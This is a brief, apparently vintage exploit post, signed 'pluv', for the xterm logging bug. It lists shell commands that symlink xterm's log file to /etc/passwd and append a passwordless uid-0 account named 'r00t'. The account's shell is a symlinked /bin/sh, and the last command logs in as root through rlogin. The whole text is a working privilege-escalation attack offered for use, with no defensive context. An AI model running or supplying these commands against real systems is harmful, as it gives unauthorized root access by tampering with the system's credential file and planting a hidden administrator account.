
The Following is an exploit for the xterm logging bug..

% mkdir foo
% ln -s /etc/passwd foo/xl
% chmod 200 foo
% ln -s /bin/sh /tmp/ss^M   <- This is a real CR
% xterm -l -lf foo/xl -e echo "r00t::0:1::/:/tmp/ss"
% rlogin localhost -l r00t


-pluv

                                                                                                                        